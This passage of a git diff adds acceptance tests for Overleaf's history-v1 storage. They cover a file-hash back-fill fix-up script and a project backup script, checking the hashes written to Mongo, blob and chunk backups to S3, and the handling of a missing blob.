+ gitBlobHash(v), + Array.from(binaryForGitBlobHash(gitBlobHash(v)).value()) + ) + } + } + + before(cleanup.everything) + + before('populate blobs/GCS', async function () { + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdRestoreFromFilestore0}`, + Stream.Readable.from([fileIdRestoreFromFilestore0.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdRestoreFromFilestore1}`, + Stream.Readable.from([fileIdRestoreFromFilestore1.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdHashMissing0}`, + Stream.Readable.from([fileIdHashMissing0.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdHashMissing1}`, + Stream.Readable.from([fileIdHashMissing1.toString()]) + ) + await new BlobStore(historyId0.toString()).putString( + fileIdHashMissing1.toString() // partially processed + ) + await new BlobStore(historyId0.toString()).putString( + fileIdBlobExistsInGCS0.toString() + ) + await new BlobStore(historyId0.toString()).putString( + fileIdBlobExistsInGCS1.toString() + ) + await new BlobStore(historyId0.toString()).putString( + fileIdRestoreFromFilestore1.toString() + ) + const path = '/tmp/test-blob-corrupted' + try { + await fs.promises.writeFile(path, contentCorruptedBlob) + await new BlobStore(historyId0.toString()).putBlob( + path, + new Blob(gitBlobHash(fileIdBlobExistsInGCSCorrupted), 42) + ) + } finally { + await fs.promises.rm(path, { force: true }) + } + await cleanup.postgres() + await cleanup.mongo() + await Promise.all([ + testProjects.createEmptyProject(historyId0.toString()), + testProjects.createEmptyProject(historyIdDeleted0), + ]) + await new BlobStore(historyId0.toString()).putString( + fileIdWithDifferentHashNotFound0.toString() + ) + await new BlobStore(historyIdDeleted0.toString()).putString( + fileIdWithDifferentHashNotFound1.toString() + ) + await new BlobStore(historyId0.toString()).putString( + fileIdInGoodState.toString() + ) + }) + + before('populate mongo', async function () { + await projectsCollection.insertMany([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + { _id: fileIdMissing0 }, + { _id: fileIdMissing0 }, // bad file-tree, duplicated fileRef. + { _id: fileIdMissing2 }, + { _id: fileIdHashMissing0 }, + { _id: fileIdHashMissing1 }, + { + _id: fileIdWithDifferentHashFound, + hash: gitBlobHash(fileIdInGoodState), + }, + { + _id: fileIdWithDifferentHashRestore, + hash: gitBlobHash(fileIdMissing0), + }, + ], + folders: [ + { + docs: [], + }, + null, + { + fileRefs: [ + null, + { + _id: fileIdInGoodState, + hash: gitBlobHash(fileIdInGoodState), + }, + { + _id: fileIdWithDifferentHashNotFound0, + hash: hashDoesNotExistAsBlob, + }, + { + _id: fileIdRestoreFromFilestore0, + hash: hashDoesNotExistAsBlob, + }, + { + _id: fileIdRestoreFromFilestore1, + }, + { + _id: fileIdBlobExistsInGCS0, + hash: gitBlobHash(fileIdBlobExistsInGCS0), + }, + { + _id: fileIdBlobExistsInGCSCorrupted, + hash: gitBlobHash(fileIdBlobExistsInGCSCorrupted), + }, + { _id: fileIdBlobExistsInGCS1 }, + ], + folders: [], + }, + ], + }, + ], + overleaf: { history: { id: historyId0 } }, + version: 0, + }, + ]) + await deletedProjectsCollection.insertMany([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [ + { + _id: fileIdWithDifferentHashNotFound1, + hash: hashDoesNotExistAsBlob, + }, + ], + folders: [ + { + fileRefs: [], + folders: [ + { fileRefs: [{ _id: fileIdMissing1 }], folders: [] }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + version: 100, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + ]) + }) + + /** + * @param {Array<string>} args + * @param {Record<string, string>} env + * @return {Promise<{ stdout: string, stderr: string, status: number }>} + */ + async function tryRunScript(args = [], env = {}) { + let result + try { + result = await promisify(execFile)( + process.argv0, + ['storage/scripts/back_fill_file_hash_fix_up.mjs', ...args], + { + encoding: 'utf-8', + timeout: TIMEOUT - 500, + env: { + ...process.env, + USER_FILES_BUCKET_NAME, + SLEEP_BEFORE_EXIT: '1', + ...env, + LOG_LEVEL: 'warn', // Override LOG_LEVEL of acceptance tests + }, + } + ) + result.status = 0 + } catch (err) { + const { stdout, stderr, code } = err + if (typeof code !== 'number') { + console.log(err) + } + result = { stdout, stderr, status: code } + } + expect((await fs.promises.readdir('/tmp')).join(';')).to.not.match( + /back_fill_file_hash/ + ) + return result + } + async function runScriptWithLogs() { + const logsPath = '/tmp/test-script-logs' + let result + try { + await fs.promises.writeFile( + logsPath, + logs.map(e => JSON.stringify(e)).join('\n') + ) + result = await tryRunScript([`--logs=${logsPath}`]) + } finally { + await fs.promises.rm(logsPath, { force: true }) + } + const stats = JSON.parse(result.stdout.trim().split('\n').pop()) + return { + result, + stats, + } + } + + let result, stats + before(async function () { + ;({ result, stats } = await runScriptWithLogs()) + }) + it('should print stats', function () { + expect(stats).to.contain({ + processedLines: 16, + success: 11, + alreadyProcessed: 0, + fileDeleted: 0, + skipped: 0, + failed: 3, + unmatched: 1, + }) + }) + it('should handle re-run on same logs', async function () { + ;({ stats } = await runScriptWithLogs()) + expect(stats).to.contain({ + processedLines: 16, + success: 0, + alreadyProcessed: 8, + fileDeleted: 3, + skipped: 0, + failed: 3, + unmatched: 1, + }) + }) + it('should flag the unknown fatal error', function () { + const unknown = result.stdout + .split('\n') + .filter(l => l.includes('unknown fatal error')) + expect(unknown).to.have.length(1) + const [line] = unknown + expect(line).to.exist + expect(line).to.include('some other error') + }) + it('should flag the unexpected blob on mismatched hash', function () { + const line = result.stdout + .split('\n') + .find(l => l.includes('found blob with computed filestore object hash')) + expect(line).to.exist + expect(line).to.include(projectId0.toString()) + expect(line).to.include(fileIdWithDifferentHashFound.toString()) + expect(line).to.include(gitBlobHash(fileIdInGoodState)) + }) + it('should flag the need to restore', function () { + const line = result.stdout + .split('\n') + .find(l => l.includes('missing blob, need to restore filestore file')) + expect(line).to.exist + expect(line).to.include(projectId0.toString()) + expect(line).to.include(fileIdWithDifferentHashRestore.toString()) + expect(line).to.include(hashDoesNotExistAsBlob) + }) + it('should flag the corrupted blob', function () { + const line = result.stdout + .split('\n') + .find(l => l.includes('blob corrupted')) + expect(line).to.exist + expect(line).to.include(projectId0.toString()) + expect(line).to.include(fileIdBlobExistsInGCSCorrupted.toString()) + expect(line).to.include( + gitBlobHashBuffer(Buffer.from(contentCorruptedBlob)) + ) + expect(line).to.include(gitBlobHash(fileIdBlobExistsInGCSCorrupted)) + }) + it('should update mongo', async function () { + expect(await projectsCollection.find({}).toArray()) + .excludingEvery([ + 'currentEndTimestamp', + 'currentEndVersion', + 'updatedAt', + 'backup', + ]) + .to.deep.equal([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + // Removed + // { _id: fileIdMissing0 }, + // Removed + // { _id: fileIdMissing2 }, + // Added hash + { + _id: fileIdHashMissing0, + hash: gitBlobHash(fileIdHashMissing0), + }, + // Added hash + { + _id: fileIdHashMissing1, + hash: gitBlobHash(fileIdHashMissing1), + }, + // No change, should warn about the find. + { + _id: fileIdWithDifferentHashFound, + hash: gitBlobHash(fileIdInGoodState), + }, + // No change, should warn about the need to restore. + { + _id: fileIdWithDifferentHashRestore, + hash: gitBlobHash(fileIdMissing0), + }, + ], + folders: [ + { + docs: [], + }, + null, + { + fileRefs: [ + null, + // No change + { + _id: fileIdInGoodState, + hash: gitBlobHash(fileIdInGoodState), + }, + // Updated hash + { + _id: fileIdWithDifferentHashNotFound0, + hash: gitBlobHash(fileIdWithDifferentHashNotFound0), + }, + // Updated hash + { + _id: fileIdRestoreFromFilestore0, + hash: gitBlobHash(fileIdRestoreFromFilestore0), + }, + // Added hash + { + _id: fileIdRestoreFromFilestore1, + hash: gitBlobHash(fileIdRestoreFromFilestore1), + }, + // No change, blob created + { + _id: fileIdBlobExistsInGCS0, + hash: gitBlobHash(fileIdBlobExistsInGCS0), + }, + // No change, flagged + { + _id: fileIdBlobExistsInGCSCorrupted, + hash: gitBlobHash(fileIdBlobExistsInGCSCorrupted), + }, + // Added hash + { + _id: fileIdBlobExistsInGCS1, + hash: gitBlobHash(fileIdBlobExistsInGCS1), + }, + ], + folders: [], + }, + ], + }, + ], + overleaf: { history: { id: historyId0 } }, + // Incremented when removing file/updating hash + version: 8, + }, + ]) + expect(await deletedProjectsCollection.find({}).toArray()).to.deep.equal([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [ + // Updated hash + { + _id: fileIdWithDifferentHashNotFound1, + hash: gitBlobHash(fileIdWithDifferentHashNotFound1), + }, + ], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + // Removed + // { _id: fileIdMissing1 }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + // Incremented when removing file/updating hash + version: 102, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + ]) + const writtenBlobsByProject = new Map() + for (const { projectId, fileId } of writtenBlobs) { + writtenBlobsByProject.set( + projectId, + (writtenBlobsByProject.get(projectId) || []).concat([fileId]) + ) + } + expect( + (await backedUpBlobs.find({}, { sort: { _id: 1 } }).toArray()).map( + entry => { + // blobs are pushed unordered into mongo. Sort the list for consistency. + entry.blobs.sort() + return entry + } + ) + ).to.deep.equal( + Array.from(writtenBlobsByProject.entries()).map( + ([projectId, fileIds]) => { + return { + _id: projectId, + blobs: fileIds + .map(fileId => binaryForGitBlobHash(gitBlobHash(fileId))) + .sort(), + } + } + ) + ) + }) + it('should have backed up all the files', async function () { + expect(tieringStorageClass).to.exist + const objects = await listS3Bucket(projectBlobsBucket, tieringStorageClass) + expect(objects.sort()).to.deep.equal( + writtenBlobs + .map(({ historyId, fileId, hash }) => + makeProjectKey(historyId, hash || gitBlobHash(fileId)) + ) + .sort() + ) + for (let { historyId, fileId } of writtenBlobs) { + const hash = gitBlobHash(fileId.toString()) + const s = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, hash), + { autoGunzip: true } + ) + const buf = new WritableBuffer() + await Stream.promises.pipeline(s, buf) + expect(gitBlobHashBuffer(buf.getContents())).to.equal(hash) + const id = buf.getContents().toString('utf-8') + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + const deks = await listS3Bucket(deksBucket, 'STANDARD') + expect(deks.sort()).to.deep.equal( + Array.from( + new Set( + writtenBlobs.map( + ({ historyId }) => projectKey.format(historyId) + '/dek' + ) + ) + ).sort() + ) + }) + it('should have written the back filled files to history v1', async function () { + for (const { historyId, fileId } of writtenBlobs) { + const blobStore = new BlobStore(historyId.toString()) + const hash = gitBlobHash(fileId.toString()) + const blob = await blobStore.getBlob(hash) + expect(blob).to.exist + expect(blob.getByteLength()).to.equal(24) + const id = await blobStore.getString(hash) + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/backup.test.mjs b/services/history-v1/test/acceptance/js/storage/backup.test.mjs new file mode 100644 index 0000000..83087a1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backup.test.mjs @@ -0,0 +1,682 @@ +import config from 'config' +import { ObjectId } from 'mongodb' +import { expect } from 'chai' +import { + backedUpBlobs, + client, + globalBlobs, +} from '../../../../storage/lib/mongodb.js' +import persistor from '../../../../storage/lib/persistor.js' +import { + loadGlobalBlobs, + BlobStore, + makeProjectKey, +} from '../../../../storage/lib/blob_store/index.js' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import projectKey from '../../../../storage/lib/project_key.js' +import { getBackupStatus } from '../../../../storage/lib/backup_store/index.js' +import { text, buffer } from 'node:stream/consumers' +import { createGunzip } from 'node:zlib' +import { Change, Operation, File, TextOperation } from 'overleaf-editor-core' +import ChunkStore from '../../../../storage/lib/chunk_store/index.js' +import persistChanges from '../../../../storage/lib/persist_changes.js' +import { historyStore } from '../../../../storage/lib/history_store.js' +import { execFile } from 'node:child_process' +import { promisify } from 'node:util' +import testFiles from '../storage/support/test_files.js' +import fs from 'node:fs' +import { + backupBlob, + storeBlobBackup, +} from '../../../../storage/lib/backupBlob.mjs' +import { + backupPersistor, + projectBlobsBucket, + chunksBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { Readable } from 'node:stream' + +const projectsCollection = client.db().collection('projects') + +/** + * @param {ObjectId} projectId + * @param {number} version + * @return {string} + */ +function makeChunkKey(projectId, version) { + return projectKey.format(projectId) + '/' + projectKey.pad(version) +} + +describe('backup script', function () { + let project + let projectId, historyId + let limitsToPersistImmediately + + before(function () { + // Used to provide a limit which forces us to persist all of the changes + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + maxChanges: 10, + maxChunkChanges: 10, + } + }) + + beforeEach(async function () { + // Set up test projects with proper history metadata + projectId = new ObjectId() + historyId = projectId.toString() + project = { + _id: projectId, + overleaf: { + history: { + id: historyId, + currentEndVersion: 0, // Will be updated as changes are made + currentEndTimestamp: new Date(), // Will be updated as changes are made + }, + backup: { + // Start with no backup state + }, + }, + } + + // Pre-load the global blobs + await loadGlobalBlobs() + + // Clean up any pre-existing test data + await projectsCollection.deleteMany({ + _id: projectId, + }) + await backedUpBlobs.deleteMany({}) // Clear any existing backedUpBlobs entries + }) + + describe('with simple project content', function () { + const contentString = 'hello world' + const newContentString = 'hello world more' + const graphPngPath = testFiles.path('graph.png') + const graphPngBuf = fs.readFileSync(graphPngPath) + const graphPngHash = testFiles.GRAPH_PNG_HASH + const nonBmpPath = testFiles.path('non_bmp.txt') + const DUMMY_HASH = '1111111111111111111111111111111111111111' + + beforeEach(async function () { + // Create initial project + await projectsCollection.insertOne(project) + + // Initialize project in chunk store + await ChunkStore.initializeProject(historyId) + + const blobStore = new BlobStore(historyId) + + // Create the blobs and then back them up using backupBlob + const graphPngBlob = await blobStore.putFile(graphPngPath) + await backupBlob(historyId, graphPngBlob, graphPngPath) + + // Add initial content using persistChanges + const file = File.fromString(contentString) + const addFileOp = Operation.addFile('main.tex', file) + const addGraphFileOp = Operation.addFile( + 'graph.png', + File.fromHash(testFiles.GRAPH_PNG_HASH) + ) + const change1 = new Change([addFileOp, addGraphFileOp], new Date(), []) + + await persistChanges(historyId, [change1], limitsToPersistImmediately, 0) + + // Add a second change with a proper TextOperation + // For text operation: first number is how many chars to retain, then the text to insert + const textOp = TextOperation.fromJSON({ + textOperation: [contentString.length, ' more'], // Keep existing content, append ' more' + }) + const editOp = Operation.editFile('main.tex', textOp) + const change2 = new Change([editOp], new Date(), []) + + // store an unrelated hash in the backedUpBlobs collection, + // so we can test that only the backed up hashes are cleared. + await storeBlobBackup(historyId, DUMMY_HASH) + + await persistChanges(historyId, [change2], limitsToPersistImmediately, 1) + }) + + it('should perform an initial backup', async function () { + // Run backup script for initial version + const { stdout } = await runBackupScript(['--projectId', projectId]) + expect(stdout).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify backup state + const result = await getBackupStatus(projectId) + expect(result.backupStatus.lastBackedUpVersion).to.equal(2) + expect(result.backupStatus.lastBackedUpAt).to.be.an.instanceOf(Date) + expect(result.currentEndTimestamp).to.be.an.instanceOf(Date) + expect(result.backupStatus.pendingChangeAt).to.be.undefined + + // Verify graph.png blob was backed up + const graphBlobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, graphPngHash), + { autoGunzip: true } + ) + const graphBlobContent = await buffer(graphBlobStream) + expect(graphBlobContent.equals(graphPngBuf)).to.be.true + + // Verify chunk was backed up + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + makeChunkKey(historyId, 0) + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const chunk = await ChunkStore.loadLatestRaw(historyId) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + + // Unrelated entries from backedUpBlobs should be not cleared + const backedUpBlobsDoc = await backedUpBlobs.findOne({ + _id: project._id, + }) + expect(backedUpBlobsDoc).not.to.be.null + expect(backedUpBlobsDoc.blobs).to.have.length(1) + expect(backedUpBlobsDoc.blobs[0].toString('hex')).to.equal(DUMMY_HASH) + }) + + it('should perform an incremental backup', async function () { + // Backup first version + const { stdout: stdout1 } = await runBackupScript([ + '--projectId', + projectId, + ]) + expect(stdout1).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify first backup + const result1 = await getBackupStatus(projectId) + expect(result1.backupStatus.lastBackedUpVersion).to.equal(2) + + // Persist additional changes + const additionalTextOp = TextOperation.fromJSON({ + textOperation: [newContentString.length, ' even more'], // Keep existing content, append ' even more' + }) + const additionalEditOp = Operation.editFile('main.tex', additionalTextOp) + const firstTimestamp = new Date() + const additionalChange = new Change( + [additionalEditOp], + firstTimestamp, + [] + ) + + // add the nonbmp file + const blobStore = new BlobStore(historyId) + const nonBmpBlob = await blobStore.putFile(nonBmpPath) + await backupBlob(historyId, nonBmpBlob, nonBmpPath) + + // Verify that the non-BMP file was backed up when the file was added + const newBackedUpBlobs = await backedUpBlobs.findOne({ + _id: project._id, + }) + expect(newBackedUpBlobs).not.to.be.null + expect(newBackedUpBlobs.blobs).to.have.length(2) + expect( + newBackedUpBlobs.blobs.map(b => b.toString('hex')) + ).to.have.members([testFiles.NON_BMP_TXT_HASH, DUMMY_HASH]) + + const addNonBmpFileOp = Operation.addFile( + 'non_bmp.txt', + File.fromHash(testFiles.NON_BMP_TXT_HASH) + ) + const secondTimestamp = new Date() + const additionalChange2 = new Change( + [addNonBmpFileOp], + secondTimestamp, + [] + ) + + await persistChanges( + historyId, + [additionalChange, additionalChange2], + limitsToPersistImmediately, + 2 + ) + + const afterChangeResult = await getBackupStatus(projectId) + // Verify that the currentEndVersion and currentEndTimestamp are updated + expect(afterChangeResult.currentEndVersion).to.equal(4) + expect(afterChangeResult.currentEndTimestamp) + .to.be.an.instanceOf(Date) + .and.to.be.greaterThan(result1.currentEndTimestamp) + // Persisting a change should not modify the backup version and timestamp + expect(afterChangeResult.backupStatus.lastBackedUpVersion).to.equal(2) + expect(afterChangeResult.backupStatus.lastBackedUpAt) + .to.be.an.instanceOf(Date) + .and.to.deep.equal(result1.backupStatus.lastBackedUpAt) + // but it should update the pendingChangeAt timestamp to the timestamp of the + // first change which modified the project + expect(afterChangeResult.backupStatus.pendingChangeAt) + .to.be.an.instanceOf(Date) + .and.to.deep.equal(firstTimestamp) + + // Second backup + const { stdout: stdout2 } = await runBackupScript([ + '--projectId', + projectId, + ]) + expect(stdout2).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify incremental backup + const result2 = await getBackupStatus(projectId) + // The backup version and timestamp should be updated + expect(result2.backupStatus.lastBackedUpVersion).to.equal(4) + expect(result2.backupStatus.lastBackedUpAt) + .to.be.an.instanceOf(Date) + .and.to.be.greaterThan(result1.backupStatus.lastBackedUpAt) + // The currentEndVersion and currentEndTimestamp should not be modified + expect(result2.currentEndVersion).to.equal(4) + expect(result2.currentEndTimestamp) + .to.be.an.instanceOf(Date) + .and.to.deep.equal(afterChangeResult.currentEndTimestamp) + // The pendingChangeAt timestamp should be cleared when the backup is complete + expect(result2.backupStatus.pendingChangeAt).to.be.undefined + + // Verify additional blob was backed up + const newBlobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, testFiles.NON_BMP_TXT_HASH), + { autoGunzip: true } + ) + const newBlobContent = await buffer(newBlobStream) + expect(newBlobContent).to.deep.equal( + fs.readFileSync(testFiles.path('non_bmp.txt')) + ) + + // Check chunk was backed up + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + makeChunkKey(historyId, 0) + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const chunk = await ChunkStore.loadLatestRaw(historyId) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + + // Unrelated entries from backedUpBlobs should be not cleared + const backedUpBlobsDoc = await backedUpBlobs.findOne({ + _id: project._id, + }) + expect(backedUpBlobsDoc).not.to.be.null + expect(backedUpBlobsDoc.blobs).to.have.length(1) + expect(backedUpBlobsDoc.blobs[0].toString('hex')).to.equal(DUMMY_HASH) + }) + + it('should not backup global blobs', async function () { + const globalBlobString = 'a' + const globalBlobHash = testFiles.STRING_A_HASH + await globalBlobs.insertOne({ + _id: globalBlobHash, + byteLength: globalBlobString.length, + stringLength: globalBlobString.length, + }) + const bucket = config.get('blobStore.globalBucket') + for (const { key, content } of [ + { + key: '2e/65/efe2a145dda7ee51d1741299f848e5bf752e', + content: globalBlobString, + }, + ]) { + const stream = Readable.from([content]) + await persistor.sendStream(bucket, key, stream) + } + await loadGlobalBlobs() + + // Create a change using the global blob + const addFileOp = Operation.addFile( + 'global.tex', + File.fromHash(globalBlobHash) + ) + const change = new Change([addFileOp], new Date(), []) + + await persistChanges(historyId, [change], limitsToPersistImmediately, 2) + + // Run backup + await runBackupScript(['--projectId', projectId]) + + // Verify global blob wasn't backed up + try { + await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, globalBlobHash), + { autoGunzip: true } + ) + expect.fail('Should not find global blob in project blobs') + } catch (err) { + expect(err).to.be.an.instanceOf(NotFoundError) + } + }) + + it('should back up global blobs if they are demoted', async function () { + const demotedBlobString = 'ab' + const demotedBlobHash = testFiles.STRING_AB_HASH + await globalBlobs.insertOne({ + _id: demotedBlobHash, + byteLength: demotedBlobString.length, + stringLength: demotedBlobString.length, + demoted: true, + }) + const bucket = config.get('blobStore.globalBucket') + for (const { key, content } of [ + { + key: '9a/e9/e86b7bd6cb1472d9373702d8249973da0832', + content: demotedBlobString, + }, + ]) { + const stream = Readable.from([content]) + await persistor.sendStream(bucket, key, stream) + } + await loadGlobalBlobs() + + // Create a change using the global blob + const addFileOp = Operation.addFile( + 'demoted.tex', + File.fromHash(demotedBlobHash) + ) + const change = new Change([addFileOp], new Date(), []) + + await persistChanges(historyId, [change], limitsToPersistImmediately, 2) + + // Run backup + const { stdout } = await runBackupScript(['--projectId', projectId]) + expect(stdout).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Check chunk was backed up + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + makeChunkKey(historyId, 0) + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const chunk = await ChunkStore.loadLatestRaw(historyId) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + + // Verify that the demoted global blob was backed up + try { + const demotedBlobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, demotedBlobHash), + { + autoGunzip: true, + } + ) + const demotedBlobContent = await buffer(demotedBlobStream) + expect(demotedBlobContent).to.deep.equal(Buffer.from(demotedBlobString)) + } catch (err) { + expect.fail('Should find demoted global blob in project blobs') + } + }) + }) + + describe('with complex project content', function () { + let beforeInitializationTimestamp + let afterInitializationTimestamp + + beforeEach(async function () { + // Create initial project + await projectsCollection.insertOne(project) + + // Initialize project in chunk store + // bracket the initialisation with two timestamps to check the pendingChangeAt field + beforeInitializationTimestamp = new Date() + await ChunkStore.initializeProject(historyId) + afterInitializationTimestamp = new Date() + + const blobStore = new BlobStore(historyId) + + // Set up test files with varying content + const testFilesData = { + mainTex: { name: 'main.tex', content: 'Initial content' }, + chapter1: { name: 'chapter1.tex', content: 'Chapter 1 content' }, + chapter2: { name: 'chapter2.tex', content: 'Chapter 2 content' }, + bibliography: { + name: 'bibliography.bib', + content: '@article{key1,\n title={Title1}\n}', + newContent: '@article{key2,\n title={Title2}\n}', + }, + graph: { + name: 'graph.png', + path: testFiles.path('graph.png'), + hash: testFiles.GRAPH_PNG_HASH, + }, + unicodeFile: { + name: 'unicodeFile.tex', + path: testFiles.path('non_bmp.txt'), + hash: testFiles.NON_BMP_TXT_HASH, + }, + } + + const textFiles = [ + testFilesData.mainTex, + testFilesData.chapter1, + testFilesData.chapter2, + testFilesData.bibliography, + ] + const binaryFiles = [testFilesData.graph, testFilesData.unicodeFile] + + // Add binary files first + await Promise.all(binaryFiles.map(file => blobStore.putFile(file.path))) + + // Back up the binary files + await Promise.all( + binaryFiles.map(async file => { + await backupBlob( + historyId, + await blobStore.putFile(file.path), + file.path + ) + }) + ) + + // Create operations to add all files initially + const addFileOperations = Object.values(testFilesData).map(file => { + if (file.path) { + return Operation.addFile(file.name, File.fromHash(file.hash)) + } + return Operation.addFile(file.name, File.fromString(file.content)) + }) + + // Initial change adding all files + const initialChange = new Change(addFileOperations, new Date(), []) + await persistChanges( + historyId, + [initialChange], + limitsToPersistImmediately, + 0 + ) + + // Generate a series of edit operations for each text file + const editOperations = [] + for (let i = 0; i < 50; i++) { + const targetFile = textFiles[i % textFiles.length] + if (!targetFile.path) { + // Skip binary/unicode files + const appendText = `\n\nEdit ${i + 1}` + targetFile.content += appendText + const textOp = TextOperation.fromJSON({ + textOperation: [ + targetFile.content.length - appendText.length, + appendText, + ], + }) + const editOp = Operation.editFile(targetFile.name, textOp) + editOperations.push(new Change([editOp], new Date(), [])) + } + } + + // Add a delete operation + const deleteChange = new Change( + [Operation.removeFile(testFilesData.bibliography.name)], + new Date(), + [] + ) + editOperations.push(deleteChange) + + // Add the file back with different content + const addBackChange = new Change( + [ + Operation.addFile( + testFilesData.bibliography.name, + File.fromString(testFilesData.bibliography.newContent) + ), + ], + new Date(), + [] + ) + editOperations.push(addBackChange) + // Persist all changes + await persistChanges( + historyId, + editOperations, + limitsToPersistImmediately, + 1 + ) + }) + + it('persistChanges should set the pendingChangeAt field to the time of snapshot initialisation', async function () { + const result = await getBackupStatus(projectId) + expect(result.backupStatus.pendingChangeAt).to.be.an.instanceOf(Date) + expect(result.backupStatus.pendingChangeAt) + .to.be.greaterThan(beforeInitializationTimestamp) + .and.to.be.lessThan(afterInitializationTimestamp) + }) + + it('should backup all chunks and blobs from a complex project history', async function () { + // Run backup script + const { stdout } = await runBackupScript(['--projectId', projectId]) + expect(stdout).to.not.include( + 'warning: persistor not passed to backupBlob' + ) + + // Verify backup state + const result = await getBackupStatus(projectId) + expect(result.backupStatus.lastBackedUpVersion).to.equal(53) // 1 initial change + 50 edits + 1 delete + 1 add back + expect(result.backupStatus.lastBackedUpAt).to.be.an.instanceOf(Date) + expect(result.currentEndTimestamp).to.be.an.instanceOf(Date) + expect(result.backupStatus.pendingChangeAt).to.be.undefined + + // Verify that binary files were backed up + for (const hash of [ + testFiles.GRAPH_PNG_HASH, + testFiles.NON_BMP_TXT_HASH, + ]) { + const blobStream = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, hash), + { autoGunzip: true } + ) + expect(blobStream).to.exist + } + + // Get all chunks and verify they were backed up + const listing = await backupPersistor + ._getClientForBucket(chunksBucket) + .listObjectsV2({ + Bucket: chunksBucket, + Prefix: projectKey.format(historyId) + '/', + }) + .promise() + const chunkKeys = listing.Contents.map(item => item.Key) + expect(chunkKeys.length).to.equal(6) // Should have multiple chunks + + const localChunks = await ChunkStore.getProjectChunks(historyId) + const chunksByStartVersion = new Map() + for (const chunkRecord of localChunks) { + chunksByStartVersion.set(chunkRecord.startVersion, chunkRecord) + } + + // Verify the content of each chunk matches what's in the history store + for (const chunkKey of chunkKeys) { + const chunkStream = await backupPersistor.getObjectStream( + chunksBucket, + chunkKey + ) + const chunkContent = await text(chunkStream.pipe(createGunzip())) + const startVersion = parseInt(chunkKey.split('/').pop(), 10) + const chunk = chunksByStartVersion.get(startVersion) + const rawHistory = await historyStore.loadRaw(historyId, chunk.id) + expect(JSON.parse(chunkContent)).to.deep.equal(rawHistory) + } + }) + + it('should throw an error if downloading a blob fails', async function () { + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putFile( + testFiles.path('null_characters.txt') + ) + const change = new Change( + [Operation.addFile('broken-file', File.fromHash(blob.getHash()))], + new Date(), + [] + ) + // Persist all changes + await persistChanges(historyId, [change], limitsToPersistImmediately, 53) + + // Delete the blob from the underlying storage to simulate a failure + const bucket = config.get('blobStore.projectBucket') + const key = makeProjectKey(historyId, blob.getHash()) + await persistor.deleteObject(bucket, key) + + // Run backup script - it should fail because the blob is missing + let result + try { + result = await runBackupScript(['--projectId', projectId]) + expect.fail('Backup script should have failed') + } catch (err) { + expect(err).to.exist + expect(result).to.not.exist + } + + // Verify that backup did not complete + const newBackupStatus = await getBackupStatus(projectId) + expect(newBackupStatus.backupStatus.lastBackedUpVersion).to.equal(50) // backup fails on final chunk + expect(newBackupStatus.currentEndVersion).to.equal(54) // backup is incomplete due to missing blob + }) + }) +}) + +/** + * Run the backup script with given arguments + * @param {string[]} args + */ +async function runBackupScript(args) { + const TIMEOUT = 20 * 1000 + let result + try { + result = await promisify(execFile)( + 'node', + ['storage/scripts/backup.mjs', ...args], + { + encoding: 'utf-8', + timeout: TIMEOUT, + env: { + ...process.env, + LOG_LEVEL: 'debug', // Override LOG_LEVEL of acceptance tests + }, + } + ) + result.status = 0 + } catch (err) { + const { stdout, stderr, code } = err + if (typeof code !== 'number') { + console.log(err) + } + result = { stdout, stderr, status: code } + } + if (result.status !== 0) { + throw new Error('backup failed') + } + return result +} diff --git a/services/history-v1/test/acceptance/js/storage/backupBlob.test.mjs 